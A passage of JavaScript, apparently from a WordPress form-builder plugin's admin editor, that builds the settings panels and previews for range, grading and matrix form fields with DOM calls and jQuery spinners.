		
	var tr1 = document.createElement('div');
		tr1.style.display="table-row";
	var tr2 = document.createElement('div');
		tr2.style.display="table-row";
		
	var td1_1 = document.createElement('div');
		td1_1.setAttribute("valign", 'middle');
		td1_1.setAttribute("align", 'left');
		td1_1.style.display="table-cell";
	  
		
	var td1_2 = document.createElement('div');
		td1_2.setAttribute("valign", 'middle');
		td1_2.setAttribute("align", 'left');
		td1_2.style.cssText="display:table-cell; padding-left:4px;";
	   
		
	var td2_1 = document.createElement('div');
		td2_1.setAttribute("valign", 'top');
		td2_1.setAttribute("align", 'left');
		td2_1.style.display="table-cell";
	   
	var td2_2 = document.createElement('div');
		td2_2.setAttribute("valign", 'top');
		td2_2.setAttribute("align", 'left');
		td2_2.style.display="table-cell";
		
	var br1 = document.createElement('br');
	
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
	
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
	if(w_required=="yes")
		required.innerHTML = " *";
	var main_td  = document.getElementById('show_table');
  
	div_label.appendChild(label);
	div_label.appendChild(required);
		
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_width);
	div_element.appendChild(adding_step);
	
	td1_1.appendChild(adding_range_input_from);
	td1_2.appendChild(adding_range_input_to);
	td2_1.appendChild(adding_range_label_from);
	td2_2.appendChild(adding_range_label_to);

	tr1.appendChild(td1_1);
	tr1.appendChild(td1_2);
	tr2.appendChild(td2_1);
	tr2.appendChild(td2_2);
	
	table_little.appendChild(tr1);
	table_little.appendChild(tr2);
	
	div_element.appendChild(table_little);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
  
	div.appendChild(div_field);
	div.appendChild(br1);
	div.appendChild(div_for_editable_labels);

    main_td.appendChild(div);
	if(w_field_label_pos=="top")
		label_top(i);
	change_class(w_class, i);
	refresh_attr(i, 'type_range');

	jQuery( "#"+i+"_elementform_id_temp0" ).spinner();
	var spinner1 = jQuery( "#"+i+"_elementform_id_temp0" ).spinner();
		spinner1.spinner( "value", w_field_value1 );
	jQuery( "#"+i+"_elementform_id_temp0" ).spinner({ step: w_field_range_step});

	jQuery( "#"+i+"_elementform_id_temp1" ).spinner();
	var spinner2 = jQuery( "#"+i+"_elementform_id_temp1" ).spinner();
		spinner2.spinner( "value", w_field_value2 );
	jQuery( "#"+i+"_elementform_id_temp1" ).spinner({ step: w_field_range_step});

	jQuery(document).ready(function() {	
		jQuery("label#"+i+"_mini_label_from").click(function() {		
			if (jQuery(this).children('input').length == 0) {				
				var form = "<input type='text' class='form' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(form);							
				jQuery("input.form").focus();			
				jQuery("input.form").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_from").text(value);		
				});	
			}	
		});		

		jQuery("label#"+i+"_mini_label_to").click(function() {	
			if (jQuery(this).children('input').length == 0) {		
				var to = "<input type='text' class='to' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(to);			
				jQuery("input.to").focus();					
				jQuery("input.to").blur(function() {			
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_to").text(value);	
				});	
			}	
		});
	});	
}


function change_range_width(a,id,form_id)
{
	document.getElementById( id+"_elementform_id_temp0" ).style.cssText="width:"+a+"px";
	document.getElementById( id+"_elementform_id_temp1" ).style.cssText="width:"+a+"px";
	document.getElementById( id+"_range_widthform_id_temp" ).value=a;
}

function change_range_step(a,id,form_id)
{
	jQuery( "#"+id+"_elementform_id_temp0" ).spinner({ step: a});
	jQuery( "#"+id+"_elementform_id_temp1" ).spinner({ step: a});
	
	document.getElementById( id+"_range_stepform_id_temp" ).value=a;
}


function type_grading(i, w_field_label, w_field_label_size, w_field_label_pos, w_items, w_total, w_required, w_class, w_attr_name, w_attr_value) {

	document.getElementById("element_type").value="type_grading";
	delete_last_child();
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");

	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
  	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
    var edit_main_tr7  = document.createElement('tr');	
	var edit_main_tr8  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');	
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "vertical-align:top" ; 	
		edit_main_td4.setAttribute("id", "items");
		
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "vertical-align:top";
     
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.setAttribute("id", "columns");
	var edit_main_td5_1 = document.createElement('td');
				
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	
	var edit_main_td7 = document.createElement('td');
		
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");				
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");
	
	var el_total_label = document.createElement('label');
		el_total_label.setAttribute("class", "fm-field-label");
		el_total_label.setAttribute("for", "element_total");
		el_total_label.innerHTML = "Total";
	
	var el_total_input = document.createElement('input');
		el_total_input.setAttribute("id", "element_total");
		el_total_input.setAttribute("type", "text");
		el_total_input.setAttribute("value", w_total);
		el_total_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
		el_total_input.setAttribute("onKeyUp", "change_total(this.value,'"+i+"')");
	
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
				
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_send");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("value", "yes");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");
		
	var el_attr_label = document.createElement('label');
	                el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.setAttribute("for", "el_choices_add");
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_grading')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_grading')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_grading')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_grading')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_items_label = document.createElement('label');
		el_items_label.setAttribute("class", "fm-field-label");
		el_items_label.setAttribute("for", "el_items_add");
		el_items_label.innerHTML = "Items ";
	var el_items_add = document.createElement('img');
		el_items_add.setAttribute("id", "el_items_add");
		el_items_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_items_add.style.cssText = 'cursor:pointer;';
		el_items_add.setAttribute("title", 'add');
		el_items_add.setAttribute("onClick", "add_grading_items("+i+")");
				
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);

    edit_main_td3.appendChild(el_total_label);
	edit_main_td3_1.appendChild(el_total_input);
		
	edit_main_td4.appendChild(el_items_label);
	edit_main_td4_1.appendChild(el_items_add);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);

	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	n=w_items.length;
	for(k=0; k<n; k++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "britems"+k);
			
		var el_items = document.createElement('input');
			el_items.setAttribute("id", "el_items"+k);
			el_items.setAttribute("type", "text");
			el_items.setAttribute("class", "fm-field-choice");
			el_items.setAttribute("value", w_items[k]);
			el_items.setAttribute("onKeyUp", "change_label('"+i+"_label_elementform_id_temp"+k+"', this.value); change_in_value('"+i+"_label_elementform_id_temp"+k+"', this.value)");
	
		var el_items_remove = document.createElement('img');
			el_items_remove.setAttribute("id", "el_items"+k+"_remove");
			el_items_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');		
			el_items_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_items_remove.setAttribute("align", 'top');
			el_items_remove.setAttribute("onClick", "remove_grading_items("+k+","+i+")");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_items);
		edit_main_td4.appendChild(el_items_remove);
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
    edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);

	
	edit_div.appendChild(edit_main_table);
	t.appendChild(edit_div);
	
	element='input';	type='grading'; 
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_grading");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
 	var adding_total = document.createElement("input");
            adding_total.setAttribute("type", "hidden");
            adding_total.setAttribute("value", w_total);
            adding_total.setAttribute("name", i+"_grading_totalform_id_temp");
            adding_total.setAttribute("id", i+"_grading_totalform_id_temp");
	    
	var div = document.createElement('div');
       	div.setAttribute("id", "main_div");

	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.cssText = "display:table-cell; vertical-align:top; width:"+w_field_label_size+"px;";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');

	var div_grading = document.createElement('div');
	    div_grading.setAttribute("id", i+"_elementform_id_temp");

	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");

	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	
	var main_td  = document.getElementById('show_table');

	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_total);
	div_element.appendChild(div_grading);
  
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
  
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);

	if(w_field_label_pos=="top")
		label_top(i);
				
	change_class(w_class, i);
	refresh_attr(i, 'type_grading');
	refresh_grading_items(i);
	add_id_and_name(i, 'type_grading');
}

function change_total(value,id)
{
	document.getElementById(id+"_grading_totalform_id_temp").value = value;
	document.getElementById(id+"_total_elementform_id_temp").innerHTML = value;
}

function type_matrix(i, w_field_label, w_field_label_size, w_field_label_pos, w_field_input_type, w_rows, w_columns, w_required, w_class, w_attr_name, w_attr_value, w_textbox_size) {

	document.getElementById("element_type").value="type_matrix";
	delete_last_child();
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');	
	var edit_main_tr2  = document.createElement('tr');	
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
		edit_main_tr10.setAttribute("id", "el_textbox");
	if(w_field_input_type!="text")
        edit_main_tr10.style.cssText = "display:none;";		

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');	
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');	
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.setAttribute("id", "rows");
		
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "vertical-align:top";
     
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.setAttribute("id", "columns");
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "vertical-align:top ";
				
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');	
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');	  
	var edit_main_td8 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');

	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');

	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
				
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");					
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_input_type_label = document.createElement('label');
		el_input_type_label.setAttribute("class", "fm-field-label");
		el_input_type_label.setAttribute("for", "edit_for_select_input_type");
		el_input_type_label.innerHTML = "Input Type";
	
	var el_input_type = document.createElement('select');
		el_input_type.setAttribute("id", "edit_for_select_input_type");
		el_input_type.setAttribute("name", "edit_for_select_input_type");
		el_input_type.setAttribute("onchange", "change_input_type("+i+",this.value); refresh_matrix("+i+")");
		el_input_type.style.cssText = 'width:200px';
                
	var el_input_type1 = document.createElement('option');
		el_input_type1.setAttribute("id", "edit_for_input_type_radio");
		el_input_type1.setAttribute("value", "radio");
	Radio_Button = document.createTextNode("Radio Button");

    var el_input_type2 = document.createElement('option');
		el_input_type2.setAttribute("id", "edit_for_input_type_checkbox");
		el_input_type2.setAttribute("value", "checkbox");
	Check_Box = document.createTextNode("Check Box");

    var el_input_type3 = document.createElement('option');
		el_input_type3.setAttribute("id", "edit_for_input_type_text");
		el_input_type3.setAttribute("value", "text");
	Text_Box= document.createTextNode("Text Box");

    var el_input_type4 = document.createElement('option');
		el_input_type4.setAttribute("id", "edit_for_input_type_select");
		el_input_type4.setAttribute("value", "select");				
	Drop_Down = document.createTextNode("Drop Down");              
	
	var el_textbox_size_label = document.createElement('label');
	    el_textbox_size_label.setAttribute("class", "fm-field-label");
	    el_textbox_size_label.setAttribute("for", "edit_for_textbox_size_label");
		el_textbox_size_label.innerHTML = "Text Box size(px) ";
		
	var el_textbox_size = document.createElement('input');
	    el_textbox_size.setAttribute("id", "edit_for_label_textbox_size");
	    el_textbox_size.setAttribute("type", "text");
	    el_textbox_size.setAttribute("value", w_textbox_size);
		el_textbox_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_textbox_size.setAttribute("onKeyUp", "refresh_matrix("+i+")");

	if(w_field_input_type=="radio")
		el_input_type1.setAttribute("selected", "selected");
	else
	{
	if(w_field_input_type=="checkbox")
		el_input_type2.setAttribute("selected", "selected");
		else{
		   if(w_field_input_type=="text")
			el_input_type3.setAttribute("selected", "selected");
		else{
		if(w_field_input_type=="select")
			el_input_type4.setAttribute("selected", "selected");
		
		}
		}
	}
		
	var el_style_label = document.createElement('label');
	        el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_send");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("value", "yes");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
        el_required.setAttribute("checked", "checked");
		
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.setAttribute("for", "el_choices_add");
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_matrix')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_matrix')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_matrix')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_matrix')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_rows_label = document.createElement('label');
		el_rows_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
		el_rows_label.innerHTML = "Rows ";
	var el_rows_add = document.createElement('img');
		el_rows_add.setAttribute("id", "el_rows_add");
